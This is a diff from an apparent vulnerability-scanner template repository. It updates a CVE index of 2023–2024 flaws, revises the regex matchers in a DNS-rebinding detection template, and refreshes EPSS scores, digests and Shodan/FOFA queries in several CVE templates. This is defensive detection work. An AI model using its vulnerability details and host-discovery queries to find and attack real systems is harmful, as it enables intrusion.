{"ID":"CVE-2023-38035","Info":{"Name":"Ivanti Sentry - Authentication Bypass","Severity":"critical","Description":"A security vulnerability in MICS Admin Portal in Ivanti MobileIron Sentry versions 9.18.0 and below, which may allow an attacker to bypass authentication controls on the administrative interface due to an insufficiently restrictive Apache HTTPD configuration.\n","Classification":{"CVSSScore":"9.8"}},"file_path":"http/cves/2023/CVE-2023-38035.yaml"}
|
||||
{"ID":"CVE-2023-38203","Info":{"Name":"Adobe ColdFusion Deserialization of Untrusted Data","Severity":"critical","Description":"Adobe ColdFusion versions 2018u17 (and earlier), 2021u7 (and earlier) and 2023u1 (and earlier) are affected by a Deserialization of Untrusted Data vulnerability that could result in Arbitrary code execution. Exploitation of this issue does not require user interaction.\n","Classification":{"CVSSScore":"9.8"}},"file_path":"http/cves/2023/CVE-2023-38203.yaml"}
|
||||
{"ID":"CVE-2023-38205","Info":{"Name":"Adobe ColdFusion - Access Control Bypass","Severity":"high","Description":"There is an access control bypass vulnerability in Adobe ColdFusion versions 2023 Update 2 and below, 2021 Update 8 and below and 2018 update 18 and below, which allows a remote attacker to bypass the ColdFusion mechanisms that restrict unauthenticated external access to ColdFusion's Administrator.\n","Classification":{"CVSSScore":"7.5"}},"file_path":"http/cves/2023/CVE-2023-38205.yaml"}
|
||||
{"ID":"CVE-2023-3836","Info":{"Name":"Dahua Smart Park Management - Arbitrary File Upload","Severity":"critical","Description":"Dahua wisdom park integrated management platform is a comprehensive management platform, a park operations,resource allocation, and intelligence services,and other functions, including/emap/devicePoint_addImgIco?.\n","Classification":{"CVSSScore":"9.8"}},"file_path":"http/cves/2023/CVE-2023-3836.yaml"}
|
||||
{"ID":"CVE-2023-3843","Info":{"Name":"mooDating 1.2 - Cross-site scripting","Severity":"medium","Description":"A vulnerability was found in mooSocial mooDating 1.2. It has been classified as problematic. Affected is an unknown function of the file /matchmakings/question of the component URL Handler. The manipulation leads to cross site scripting. It is possible to launch the attack remotely. VDB-235194 is the identifier assigned to this vulnerability. NOTE: We tried to contact the vendor early about the disclosure but the official mail address was not working properly.\n","Classification":{"CVSSScore":"6.1"}},"file_path":"http/cves/2023/CVE-2023-3843.yaml"}
|
||||
|
@ -2279,14 +2281,17 @@
|
|||
{"ID":"CVE-2023-6634","Info":{"Name":"LearnPress \u003c 4.2.5.8 - Remote Code Execution","Severity":"critical","Description":"The LearnPress plugin for WordPress is vulnerable to Command Injection in all versions up to, and including, 4.2.5.7 via the get_content function. This is due to the plugin making use of the call_user_func function with user input. This makes it possible for unauthenticated attackers to execute any public function with one parameter, which could result in remote code execution.\n","Classification":{"CVSSScore":"9.8"}},"file_path":"http/cves/2023/CVE-2023-6634.yaml"}
|
||||
{"ID":"CVE-2023-6831","Info":{"Name":"mlflow - Path Traversal","Severity":"high","Description":"Path Traversal: '\\..\\filename' in GitHub repository mlflow/mlflow prior to 2.9.2.\n","Classification":{"CVSSScore":"8.1"}},"file_path":"http/cves/2023/CVE-2023-6831.yaml"}
|
||||
{"ID":"CVE-2023-6875","Info":{"Name":"WordPress POST SMTP Mailer \u003c= 2.8.7 - Authorization Bypass","Severity":"critical","Description":"The POST SMTP Mailer – Email log, Delivery Failure Notifications and Best Mail SMTP for WordPress plugin for WordPress is vulnerable to unauthorized access of data and modification of data due to a type juggling issue on the connect-app REST endpoint in all versions up to, and including, 2.8.7.\n","Classification":{"CVSSScore":"9.8"}},"file_path":"http/cves/2023/CVE-2023-6875.yaml"}
|
||||
{"ID":"CVE-2023-6895","Info":{"Name":"Hikvision Intercom Broadcasting System - Command Execution","Severity":"critical","Description":"Hikvision Intercom Broadcasting System 3.0.3_20201113_RELEASE (HIK) version has an operating system command injection vulnerability. The vulnerability originates from the parameter jsondata[ip] in the file /php/ping.php, which can cause operating system command injection.\n","Classification":{"CVSSScore":"9.8"}},"file_path":"http/cves/2023/CVE-2023-6895.yaml"}
|
||||
{"ID":"CVE-2023-6909","Info":{"Name":"Mlflow \u003c2.9.2 - Path Traversal","Severity":"critical","Description":"Path Traversal: '\\..\\filename' in GitHub repository mlflow/mlflow prior to 2.9.2.\n","Classification":{"CVSSScore":"9.3"}},"file_path":"http/cves/2023/CVE-2023-6909.yaml"}
|
||||
{"ID":"CVE-2023-6977","Info":{"Name":"Mlflow \u003c2.8.0 - Local File Inclusion","Severity":"high","Description":"Mlflow before 2.8.0 is susceptible to local file inclusion due to path traversal in GitHub repository mlflow/mlflow. An attacker can potentially obtain sensitive information, modify data, and/or execute unauthorized administrative operations in the context of the affected site.\n","Classification":{"CVSSScore":"7.5"}},"file_path":"http/cves/2023/CVE-2023-6977.yaml"}
|
||||
{"ID":"CVE-2023-7028","Info":{"Name":"GitLab - Account Takeover via Password Reset","Severity":"critical","Description":"An issue has been discovered in GitLab CE/EE affecting all versions from 16.1 prior to 16.1.6, 16.2 prior to 16.2.9, 16.3 prior to 16.3.7, 16.4 prior to 16.4.5, 16.5 prior to 16.5.6, 16.6 prior to 16.6.4, and 16.7 prior to 16.7.2 in which user account password reset emails could be delivered to an unverified email address.\n","Classification":{"CVSSScore":"10"}},"file_path":"http/cves/2023/CVE-2023-7028.yaml"}
|
||||
{"ID":"CVE-2024-0204","Info":{"Name":"Fortra GoAnywhere MFT - Authentication Bypass","Severity":"critical","Description":"Authentication bypass in Fortra's GoAnywhere MFT prior to 7.4.1 allows an unauthorized user to create an admin user via the administration portal.\n","Classification":{"CVSSScore":"9.8"}},"file_path":"http/cves/2024/CVE-2024-0204.yaml"}
|
||||
{"ID":"CVE-2024-0305","Info":{"Name":"Ncast busiFacade - Remote Command Execution","Severity":"high","Description":"The Ncast Yingshi high-definition intelligent recording and playback system is a newly developed audio and video recording and playback system. The system has RCE vulnerabilities in versions 2017 and earlier.\n","Classification":{"CVSSScore":"7.5"}},"file_path":"http/cves/2024/CVE-2024-0305.yaml"}
|
||||
{"ID":"CVE-2024-0352","Info":{"Name":"Likeshop \u003c 2.5.7.20210311 - Arbitrary File Upload","Severity":"critical","Description":"A vulnerability classified as critical was found in Likeshop up to 2.5.7.20210311. This vulnerability affects the function FileServer::userFormImage of the file server/application/api/controller/File.php of the component HTTP POST Request Handler. The manipulation of the argument file with an unknown input leads to a unrestricted upload vulnerability. The CWE definition for the vulnerability is CWE-434\n","Classification":{"CVSSScore":"9.8"}},"file_path":"http/cves/2024/CVE-2024-0352.yaml"}
|
||||
{"ID":"CVE-2024-0713","Info":{"Name":"Monitorr Services Configuration - Arbitrary File Upload","Severity":"high","Description":"A vulnerability was found in Monitorr 1.7.6m. It has been declared as critical. Affected by this vulnerability is an unknown functionality of the file /assets/php/upload.php of the component Services Configuration. The manipulation of the argument fileToUpload leads to unrestricted upload. The attack can be launched remotely. The exploit has been disclosed to the public and may be used. The associated identifier of this vulnerability is VDB-251539. NOTE: The vendor was contacted early about this disclosure but did not respond in any way.\n","Classification":{"CVSSScore":"8.8"}},"file_path":"http/cves/2024/CVE-2024-0713.yaml"}
|
||||
{"ID":"CVE-2024-1021","Info":{"Name":"Rebuild \u003c= 3.5.5 - Server-Side Request Forgery","Severity":"medium","Description":"There is a security vulnerability in Rebuild 3.5.5, which is due to a server-side request forgery vulnerability in the URL parameter of the readRawText function of the HTTP Request Handler component.\n","Classification":{"CVSSScore":"N/A"}},"file_path":"http/cves/2024/CVE-2024-1021.yaml"}
|
||||
{"ID":"CVE-2024-1061","Info":{"Name":"WordPress HTML5 Video Player - SQL Injection","Severity":"high","Description":"WordPress HTML5 Video Player plugin is vulnerable to SQL injection. An unauthenticated attacker can exploit this vulnerability to perform SQL injection attacks.\n","Classification":{"CVSSScore":"8.6"}},"file_path":"http/cves/2024/CVE-2024-1061.yaml"}
|
||||
{"ID":"CVE-2024-1071","Info":{"Name":"WordPress Ultimate Member 2.1.3 - 2.8.2 – SQL Injection","Severity":"critical","Description":"The Ultimate Member - User Profile, Registration, Login, Member Directory, Content Restriction \u0026 Membership Plugin plugin for WordPress is vulnerable to SQL Injection via the ‘sorting’ parameter in versions 2.1.3 to 2.8.2 due to insufficient escaping on the user supplied parameter and lack of sufficient preparation on the existing SQL query. This makes it possible for unauthenticated attackers to append additional SQL queries into already existing queries that can be used to extract sensitive information from the database.\n","Classification":{"CVSSScore":"N/A"}},"file_path":"http/cves/2024/CVE-2024-1071.yaml"}
|
||||
{"ID":"CVE-2024-1208","Info":{"Name":"LearnDash LMS \u003c 4.10.3 - Sensitive Information Exposure","Severity":"medium","Description":"The LearnDash LMS plugin for WordPress is vulnerable to Sensitive Information Exposure in all versions up to, and including, 4.10.2 via API. This makes it possible for unauthenticated attackers to obtain access to quiz questions.\n","Classification":{"CVSSScore":"5.3"}},"file_path":"http/cves/2024/CVE-2024-1208.yaml"}
|
||||
{"ID":"CVE-2024-1209","Info":{"Name":"LearnDash LMS \u003c 4.10.2 - Sensitive Information Exposure via assignments","Severity":"medium","Description":"The LearnDash LMS plugin for WordPress is vulnerable to Sensitive Information Exposure in all versions up to, and including, 4.10.1 via direct file access due to insufficient protection of uploaded assignments. This makes it possible for unauthenticated attackers to obtain those uploads.\n","Classification":{"CVSSScore":"5.3"}},"file_path":"http/cves/2024/CVE-2024-1209.yaml"}
|
||||
{"ID":"CVE-2024-1210","Info":{"Name":"LearnDash LMS \u003c 4.10.2 - Sensitive Information Exposure","Severity":"medium","Description":"The LearnDash LMS plugin for WordPress is vulnerable to Sensitive Information Exposure in all versions up to, and including, 4.10.1 via API. This makes it possible for unauthenticated attackers to obtain access to quizzes.\n","Classification":{"CVSSScore":"5.3"}},"file_path":"http/cves/2024/CVE-2024-1210.yaml"}
|
||||
|
@ -2298,6 +2303,7 @@
|
|||
{"ID":"CVE-2024-22024","Info":{"Name":"Ivanti Connect Secure - XXE","Severity":"high","Description":"Ivanti Connect Secure is vulnerable to XXE (XML External Entity) injection.\n","Classification":{"CVSSScore":"N/A"}},"file_path":"http/cves/2024/CVE-2024-22024.yaml"}
|
||||
{"ID":"CVE-2024-22319","Info":{"Name":"IBM Operational Decision Manager - JNDI Injection","Severity":"critical","Description":"IBM Operational Decision Manager 8.10.3, 8.10.4, 8.10.5.1, 8.11, 8.11.0.1, and 8.12.0.1 is susceptible to remote code execution attack via JNDI injection when passing an unchecked argument to a certain API. IBM X-Force ID: 279145.\n","Classification":{"CVSSScore":"9.8"}},"file_path":"http/cves/2024/CVE-2024-22319.yaml"}
|
||||
{"ID":"CVE-2024-22320","Info":{"Name":"IBM Operational Decision Manager - Java Deserialization","Severity":"high","Description":"IBM Operational Decision Manager 8.10.3, 8.10.4, 8.10.5.1, 8.11, 8.11.0.1, and 8.12.0.1 could allow a remote authenticated attacker to execute arbitrary code on the system, caused by an unsafe deserialization. By sending specially crafted request, an attacker could exploit this vulnerability to execute arbitrary code in the context of SYSTEM. IBM X-Force ID: 279146.\n","Classification":{"CVSSScore":"8.8"}},"file_path":"http/cves/2024/CVE-2024-22320.yaml"}
|
||||
{"ID":"CVE-2024-23334","Info":{"Name":"aiohttp - Directory Traversal","Severity":"high","Description":"aiohttp is an asynchronous HTTP client/server framework for asyncio and Python. When using aiohttp as a web server and configuring static routes, it is necessary to specify the root path for static files. Additionally, the option 'follow_symlinks' can be used to determine whether to follow symbolic links outside the static root directory. When 'follow_symlinks' is set to True, there is no validation to check if reading a file is within the root directory. This can lead to directory traversal vulnerabilities, resulting in unauthorized access to arbitrary files on the system, even when symlinks are not present. Disabling follow_symlinks and using a reverse proxy are encouraged mitigations. Version 3.9.2 fixes this issue.\n","Classification":{"CVSSScore":"7.5"}},"file_path":"http/cves/2024/CVE-2024-23334.yaml"}
|
||||
{"ID":"CVE-2024-25600","Info":{"Name":"Unauthenticated Remote Code Execution – Bricks \u003c= 1.9.6","Severity":"critical","Description":"Bricks Builder is a popular WordPress development theme with approximately 25,000 active installations. It provides an intuitive drag-and-drop interface for designing and building WordPress websites. Bricks \u003c= 1.9.6 is vulnerable to unauthenticated remote code execution (RCE) which means that anybody can run arbitrary commands and take over the site/server. This can lead to various malicious activities\n","Classification":{"CVSSScore":"N/A"}},"file_path":"http/cves/2024/CVE-2024-25600.yaml"}
|
||||
{"ID":"CVE-2024-25669","Info":{"Name":"CaseAware a360inc - Cross-Site Scripting","Severity":"medium","Description":"a360inc CaseAware contains a reflected cross-site scripting vulnerability via the user parameter transmitted in the login.php query string. This is a bypass of the fix reported in CVE-2017-\u003e\n","Classification":{"CVSSScore":"6.1"}},"file_path":"http/cves/2024/CVE-2024-25669.yaml"}
|
||||
{"ID":"CVE-2024-25735","Info":{"Name":"WyreStorm Apollo VX20 - Information Disclosure","Severity":"high","Description":"An issue was discovered on WyreStorm Apollo VX20 devices before 1.3.58. Remote attackers can discover cleartext credentials for the SoftAP (access point) Router /device/config using an HTTP GET request.\n","Classification":{"CVSSScore":"N/A"}},"file_path":"http/cves/2024/CVE-2024-25735.yaml"}
|
||||
|
|
|
@ -1 +1 @@
|
|||
eb2a2554dd005ef35adf0ff115ae4913
|
||||
d1c0809e63305403ca431401cfcebe07
|
||||
|
|
|
@ -1,5 +1,4 @@
|
|||
id: dns-rebinding
|
||||
|
||||
info:
|
||||
name: DNS Rebinding Attack
|
||||
author: ricardomaia
|
||||
|
@ -10,6 +9,8 @@ info:
|
|||
- https://capec.mitre.org/data/definitions/275.html
|
||||
- https://payatu.com/blog/dns-rebinding/
|
||||
- https://heimdalsecurity.com/blog/dns-rebinding/
|
||||
metadata:
|
||||
max-request: 2
|
||||
tags: redirect,dns,network
|
||||
|
||||
dns:
|
||||
|
@ -20,7 +21,7 @@ dns:
|
|||
- type: regex
|
||||
part: answer
|
||||
regex:
|
||||
- 'IN.*A.(\s)*(127\.0\.0\.1|10\.\d{1,3}\.\d{1,3}\.\d{1,3}|172\.(1[6-9]|2\d|3[0-1])\.\d{1,3}\.\d{1,3}|192\.168\.\d{1,3}\.\d{1,3})(127\.0\.0\.1|\b10\.\d{1,3}\.\d{1,3}\.\d{1,3}\b|172\.(1[6-9]|2\d|3[0-1])\.\d{1,3}\.\d{1,3}|192\.168\.\d{1,3}\.\d{1,3})$'
|
||||
- 'IN\s+A\s+(127\.0\.0\.1|10\.\d{1,3}\.\d{1,3}\.\d{1,3}|172\.(1[6-9]|2\d|3[0-1])\.\d{1,3}\.\d{1,3}|192\.168\.\d{1,3}\.\d{1,3})$'
|
||||
|
||||
extractors:
|
||||
- type: regex
|
||||
|
@ -28,35 +29,22 @@ dns:
|
|||
name: IPv4
|
||||
group: 1
|
||||
regex:
|
||||
- 'IN.*A.(\s)*(127\.0\.0\.1|10\.\d{1,3}\.\d{1,3}\.\d{1,3}|172\.(1[6-9]|2\d|3[0-1])\.\d{1,3}\.\d{1,3}|192\.168\.\d{1,3}\.\d{1,3})(127\.0\.0\.1|\b10\.\d{1,3}\.\d{1,3}\.\d{1,3}\b|172\.(1[6-9]|2\d|3[0-1])\.\d{1,3}\.\d{1,3}|192\.168\.\d{1,3}\.\d{1,3})'
|
||||
- 'IN\s+A\s+(127\.0\.0\.1|10\.\d{1,3}\.\d{1,3}\.\d{1,3}|172\.(1[6-9]|2\d|3[0-1])\.\d{1,3}\.\d{1,3}|192\.168\.\d{1,3}\.\d{1,3})'
|
||||
|
||||
- name: "{{FQDN}}"
|
||||
type: AAAA
|
||||
matchers:
|
||||
# IPv6 Compressed
|
||||
# IPv6 Compressed and Full
|
||||
- type: regex
|
||||
part: answer
|
||||
regex:
|
||||
- "IN.+A.+(fd([0-9a-fA-F]{2}):([0-9a-fA-F]{0,4}:){0,5}(:[0-9a-fA-F]{0,4}){1,2}(:)?)$"
|
||||
|
||||
# IPv6
|
||||
- type: regex
|
||||
part: answer
|
||||
regex:
|
||||
- "IN.+A.+(fd([0-9a-fA-F]{2}):([0-9a-fA-F]{1,4}:){0,5}([0-9a-fA-F]{1,4}:){1,2}[0-9a-fA-F]{1,4})$"
|
||||
- "IN\\s+AAAA\\s+(fd[0-9a-fA-F]{2}(:[0-9a-fA-F]{0,4}){0,7})"
|
||||
|
||||
extractors:
|
||||
- type: regex
|
||||
part: answer
|
||||
name: IPv6_Compressed
|
||||
name: IPv6_ULA
|
||||
group: 1
|
||||
regex:
|
||||
- "IN.+A.+(fd([0-9a-fA-F]{2}):([0-9a-fA-F]{0,4}:){0,5}(:[0-9a-fA-F]{0,4}){1,2}(:)?)$"
|
||||
|
||||
- type: regex
|
||||
part: answer
|
||||
name: IPv6
|
||||
group: 1
|
||||
regex:
|
||||
- "IN.+A.+(fd([0-9a-fA-F]{2}):([0-9a-fA-F]{1,4}:){0,5}([0-9a-fA-F]{1,4}:){1,2}[0-9a-fA-F]{1,4})$"
|
||||
# digest: 4a0a004730450221009a895344f0f4bf8d0444566a7a2392d2074708d88d29a0922ebb71935290785702200a338fe1517c225d45750b08f80f3a903cd5925a32c542b5559f0202173732be:922c64590222798bb761d5b6d8e72950
|
||||
- "IN\\s+AAAA\\s+(fd[0-9a-fA-F]{2}(:[0-9a-fA-F]{0,4}){0,7})"
|
||||
# digest: 4b0a00483046022100f31fd9369022bcafe6da846b246069391f1c22137b8024bb71905634ffa56673022100ea3679256b9518c8853b42432e216d4da6ff3e88ebee349b67e8e8ba7d8a13e1:922c64590222798bb761d5b6d8e72950
|
|
@ -1,4 +1,4 @@
|
|||
id: linkedin-client-id
|
||||
id: linkedin-id
|
||||
|
||||
info:
|
||||
name: Linkedin Client ID
|
||||
|
|
|
@ -20,7 +20,7 @@ info:
|
|||
cve-id: CVE-2018-25031
|
||||
cwe-id: CWE-20
|
||||
epss-score: 0.00265
|
||||
epss-percentile: 0.64105
|
||||
epss-percentile: 0.65414
|
||||
cpe: cpe:2.3:a:smartbear:swagger_ui:*:*:*:*:*:*:*:*
|
||||
metadata:
|
||||
verified: true
|
||||
|
@ -30,7 +30,6 @@ info:
|
|||
shodan-query: http.component:"Swagger"
|
||||
fofa-query: icon_hash="-1180440057"
|
||||
tags: headless,cve,cve2018,swagger,xss,smartbear
|
||||
|
||||
headless:
|
||||
- steps:
|
||||
- args:
|
||||
|
@ -71,4 +70,4 @@ headless:
|
|||
words:
|
||||
- "swagger"
|
||||
case-insensitive: true
|
||||
# digest: 4a0a00473045022013f081ac9ee7ec2705ebf232439f9b18c17b162f4e3bfc4485638f324af817df022100e3e262210320011237b59f2a16f32a64e4ad8aba204a3c0f23a4ecda48368644:922c64590222798bb761d5b6d8e72950
|
||||
# digest: 490a004630440220276c4920b8b15fde2802ab2d829106243bfa1d1b5eec02e3ea13925bb1a2367f022012c9b9cb6e5b2906f68da10c6d0aa5c7462f847f906fc82ae576ac26db37fbbb:922c64590222798bb761d5b6d8e72950
|
|
@ -20,8 +20,8 @@ info:
|
|||
cvss-score: 9.8
|
||||
cve-id: CVE-2014-6271
|
||||
cwe-id: CWE-78
|
||||
epss-score: 0.97564
|
||||
epss-percentile: 0.99999
|
||||
epss-score: 0.97559
|
||||
epss-percentile: 0.99997
|
||||
cpe: cpe:2.3:a:gnu:bash:1.14.0:*:*:*:*:*:*:*
|
||||
metadata:
|
||||
max-request: 8
|
||||
|
@ -58,4 +58,4 @@ http:
|
|||
- type: status
|
||||
status:
|
||||
- 200
|
||||
# digest: 4a0a0047304502203c32ed699b5b5784b8f6eddd60a3c06b1a1c8dbefd3024f425307f8f793e0f64022100e4987775a712348ab69dbb368677664e21d2d753a3ba22ab15c2dcd0d426cf49:922c64590222798bb761d5b6d8e72950
|
||||
# digest: 4a0a00473045022022d9c0adae74cdc979a9807c7b6c229b34bbaf77fdf9fb5edbd4263a3e3d939d022100bff54d932fc7f8bc11b979b2289b87a588833b45578f1945d5e8dc9a7021354b:922c64590222798bb761d5b6d8e72950
|
|
@ -21,7 +21,7 @@ info:
|
|||
cve-id: CVE-2014-8799
|
||||
cwe-id: CWE-22
|
||||
epss-score: 0.17844
|
||||
epss-percentile: 0.95686
|
||||
epss-percentile: 0.96002
|
||||
cpe: cpe:2.3:a:dukapress:dukapress:*:*:*:*:*:wordpress:*:*
|
||||
metadata:
|
||||
max-request: 1
|
||||
|
@ -50,4 +50,4 @@ http:
|
|||
- type: status
|
||||
status:
|
||||
- 200
|
||||
# digest: 4a0a0047304502206a7436cc97bf8ecebcb667d7af15dcf23669c6fe4558d8041af31eb305bc605e022100f724c31ae974833f30f077f071146f044c59dd077af802bcc254aaa7e7f82ee2:922c64590222798bb761d5b6d8e72950
|
||||
# digest: 4a0a00473045022100c44ca338e0e27aef8473eed734aaf201ffdbd8635955e4b8e4cbfb37f596bd5802202fa69ab04ca34891ed8896145cbd8e1af1443228c1e766e1cc8f6591c0e74f45:922c64590222798bb761d5b6d8e72950
|
|
@ -20,8 +20,8 @@ info:
|
|||
cvss-score: 9.8
|
||||
cve-id: CVE-2018-17431
|
||||
cwe-id: CWE-287
|
||||
epss-score: 0.11315
|
||||
epss-percentile: 0.94677
|
||||
epss-score: 0.11416
|
||||
epss-percentile: 0.95073
|
||||
cpe: cpe:2.3:a:comodo:unified_threat_management_firewall:*:*:*:*:*:*:*:*
|
||||
metadata:
|
||||
max-request: 2
|
||||
|
@ -50,4 +50,4 @@ http:
|
|||
- type: status
|
||||
status:
|
||||
- 200
|
||||
# digest: 4a0a0047304502206e56a0d536dfc8d4ed10ae0505f2d2548b6c986854d0813c6e8185acc66756d9022100e74e57bbb9b04d2860f174d0f9effbef03a265a0ada954ea317f3fffa89a12ca:922c64590222798bb761d5b6d8e72950
|
||||
# digest: 4a0a00473045022100b58e1f2764198a04cdc831884ce49a67189b6a1988fcf7e27f9d82ed83cd2a3402206c36044d3ad9e30032c1e67d471ee256bb7602b09812ffc7830995d5808c7ff1:922c64590222798bb761d5b6d8e72950
|
|
@ -15,13 +15,14 @@ info:
|
|||
- https://wordpress.org/plugins/jsmol2wp/
|
||||
- https://github.com/sullo/advisory-archives/blob/master/wordpress-jsmol2wp-CVE-2018-20463-CVE-2018-20462.txt
|
||||
- https://nvd.nist.gov/vuln/detail/CVE-2018-20463
|
||||
- https://github.com/ARPSyndicate/cvemon
|
||||
classification:
|
||||
cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N
|
||||
cvss-score: 7.5
|
||||
cve-id: CVE-2018-20463
|
||||
cwe-id: CWE-22
|
||||
epss-score: 0.01939
|
||||
epss-percentile: 0.87393
|
||||
epss-percentile: 0.88289
|
||||
cpe: cpe:2.3:a:jsmol2wp_project:jsmol2wp:1.07:*:*:*:*:wordpress:*:*
|
||||
metadata:
|
||||
verified: true
|
||||
|
@ -53,4 +54,4 @@ http:
|
|||
- type: status
|
||||
status:
|
||||
- 200
|
||||
# digest: 4a0a0047304502205f9aeadd874f5fdf363e87acc0ec34f995e53677d28cbc33b27cf113d9de2b03022100c5b000d74f0180cb372d2dd355622f03e7cb2b5180ac3cb0e6f0660049f49dba:922c64590222798bb761d5b6d8e72950
|
||||
# digest: 4b0a004830460221008b0f6a4e144ec0a4f5fb0f772930b5da535472e941723be6c675589ac426a8b5022100bef4cc125a636184009e644aeb5fa64c4a868c49d7c081e63409ed228515e3ed:922c64590222798bb761d5b6d8e72950
|
|
@ -20,8 +20,8 @@ info:
|
|||
cvss-score: 6.1
|
||||
cve-id: CVE-2020-24223
|
||||
cwe-id: CWE-79
|
||||
epss-score: 0.00976
|
||||
epss-percentile: 0.81758
|
||||
epss-score: 0.0069
|
||||
epss-percentile: 0.79602
|
||||
cpe: cpe:2.3:a:mara_cms_project:mara_cms:7.5:*:*:*:*:*:*:*
|
||||
metadata:
|
||||
max-request: 1
|
||||
|
@ -49,4 +49,4 @@ http:
|
|||
- type: status
|
||||
status:
|
||||
- 200
|
||||
# digest: 4b0a00483046022100c973b82339421ec3089eac4ceee54851fb8db56c023e4110994b8c16b279307f022100ba5f5c61a9f8acb6755ba89ca34bb684ee60ac4e1e7c96f40f0688789b22e49a:922c64590222798bb761d5b6d8e72950
|
||||
# digest: 4a0a0047304502203465eb756d9c1c2a642192e678566a419006885438b5721b7a8b54470650a994022100a3b09f8d55baad75a18b6eb7fab36fd7cf976201304457c717358dd7b6fa2862:922c64590222798bb761d5b6d8e72950
|
|
@ -14,13 +14,15 @@ info:
|
|||
- https://talosintelligence.com/vulnerability_reports/TALOS-2021-1274
|
||||
- https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-21805
|
||||
- https://nvd.nist.gov/vuln/detail/CVE-2021-21805
|
||||
- https://github.com/ARPSyndicate/cvemon
|
||||
- https://github.com/ARPSyndicate/kenzer-templates
|
||||
classification:
|
||||
cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
|
||||
cvss-score: 9.8
|
||||
cve-id: CVE-2021-21805
|
||||
cwe-id: CWE-78
|
||||
epss-score: 0.97374
|
||||
epss-percentile: 0.99892
|
||||
epss-percentile: 0.99895
|
||||
cpe: cpe:2.3:a:advantech:r-seenet:2.4.12:*:*:*:*:*:*:*
|
||||
metadata:
|
||||
verified: true
|
||||
|
@ -52,4 +54,4 @@ http:
|
|||
- type: status
|
||||
status:
|
||||
- 200
|
||||
# digest: 4a0a00473045022100f2a3e97b98df27aafb1f8001f577c595d1cbb4fed075db594314502fbf283bd602204b4e9e0d429dacbd3c7672f6fd16118bbc7e73d54077c27d333a19e89ac0f5db:922c64590222798bb761d5b6d8e72950
|
||||
# digest: 490a004630440220239da739e577f078def3474254759fb447a0e1c7ae5e5c894fc15f3748b3752b022039afb1da09e145478b68a7981ab742ece2729a5f473a12d97e7c259b4bddafb6:922c64590222798bb761d5b6d8e72950
|
|
@ -21,7 +21,7 @@ info:
|
|||
cve-id: CVE-2021-22873
|
||||
cwe-id: CWE-601
|
||||
epss-score: 0.00922
|
||||
epss-percentile: 0.81209
|
||||
epss-percentile: 0.82474
|
||||
cpe: cpe:2.3:a:revive-adserver:revive_adserver:*:*:*:*:*:*:*:*
|
||||
metadata:
|
||||
verified: true
|
||||
|
@ -49,4 +49,4 @@ http:
|
|||
part: header
|
||||
regex:
|
||||
- '(?m)^(?:Location\s*?:\s*?)(?:https?:\/\/|\/\/|\/\\\\|\/\\)(?:[a-zA-Z0-9\-_\.@]*)interact\.sh\/?(\/|[^.].*)?$' # https://regex101.com/r/L403F0/1
|
||||
# digest: 490a0046304402206825e5ab8251fc139a7b9f7ac5b06687ca56ae1e65ed767ca11c20c7930c7e1f02205a2f6d3c6d66a885a07cd69568accc9951b72dc883ed9cc1f62f561083da2e0c:922c64590222798bb761d5b6d8e72950
|
||||
# digest: 4a0a0047304502201f562b389b6a5f97abaafe839123249c8bfc49d20d8cc12c06a61ee23b840795022100e4d6049c15f40c1564d2e55b52873ca91a7030a85feb7605ebf54ce291e513d5:922c64590222798bb761d5b6d8e72950
|
|
@ -6,26 +6,26 @@ info:
|
|||
severity: critical
|
||||
description: |
|
||||
The wcfm_ajax_controller AJAX action of the WCFM Marketplace WordPress plugin before 3.4.12, available to unauthenticated and authenticated user, does not properly sanitise multiple parameters before using them in SQL statements, leading to SQL injections.
|
||||
remediation: Fixed in 3.4.12
|
||||
reference:
|
||||
- https://wpscan.com/vulnerability/763c08a0-4b2b-4487-b91c-be6cc2b9322e/
|
||||
- https://nvd.nist.gov/vuln/detail/CVE-2021-24849
|
||||
- https://wordpress.org/plugins/wc-multivendor-marketplace/
|
||||
remediation: Fixed in 3.4.12
|
||||
classification:
|
||||
cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
|
||||
cvss-score: 9.8
|
||||
cve-id: CVE-2021-24849
|
||||
cwe-id: CWE-89
|
||||
cpe: cpe:2.3:a:wclovers:frontend_manager_for_woocommerce_along_with_bookings_subscription_listings_compatible:*:*:*:*:*:wordpress:*:*
|
||||
epss-score: 0.00199
|
||||
epss-percentile: 0.56492
|
||||
cpe: cpe:2.3:a:wclovers:frontend_manager_for_woocommerce_along_with_bookings_subscription_listings_compatible:*:*:*:*:*:wordpress:*:*
|
||||
metadata:
|
||||
verified: true
|
||||
max-request: 1
|
||||
vendor: wclovers
|
||||
product: frontend_manager_for_woocommerce_along_with_bookings_subscription_listings_compatible
|
||||
product: "frontend_manager_for_woocommerce_along_with_bookings_subscription_listings_compatible"
|
||||
framework: wordpress
|
||||
publicwww-query: "/wp-content/plugins/wc-multivendor-marketplace"
|
||||
verified: true
|
||||
max-request: 3
|
||||
vendor: wclovers
|
||||
tags: wpscan,cve,cve2021,wp,wp-plugin,wordpress,wc-multivendor-marketplace,wpscan,sqli
|
||||
|
||||
flow: http(1) && http(2)
|
||||
|
@ -67,4 +67,4 @@ http:
|
|||
- 'contains(header, "application/json")'
|
||||
- 'contains(body, "success")'
|
||||
condition: and
|
||||
# digest: 4a0a00473045022100ac9faa851954e06269fcb6c1d2c78475a2f575683ef8f476b96450a5671b359102205d7f4ea4de3b3c6db211c706adcd4be8f13de39a9098990f182b0f2008efc79a:922c64590222798bb761d5b6d8e72950
|
||||
# digest: 4a0a00473045022100ef54cd087054515b6ef2f1935d258ecea55b3abf384cd95798b8cd351a5f1fe90220070a59d1e5a3ab49e8fc248e2ddc238e33958d75f7b3cfc5700b5018b8116f82:922c64590222798bb761d5b6d8e72950
|
|
@ -18,8 +18,8 @@ info:
|
|||
cwe-id: CWE-22
|
||||
cpe: cpe:2.3:a:os4ed:opensis:8.0:*:*:*:community:*:*:*
|
||||
metadata:
|
||||
max-request: 1
|
||||
shodan-query: title:"openSIS"
|
||||
shodan-query: "title:\"openSIS\""
|
||||
max-request: 2
|
||||
tags: cve,cve2021,lfi,os4ed,opensis,authenticated
|
||||
|
||||
http:
|
||||
|
@ -42,4 +42,4 @@ http:
|
|||
- 'contains(body_1, "openSIS")'
|
||||
- "status_code == 200"
|
||||
condition: and
|
||||
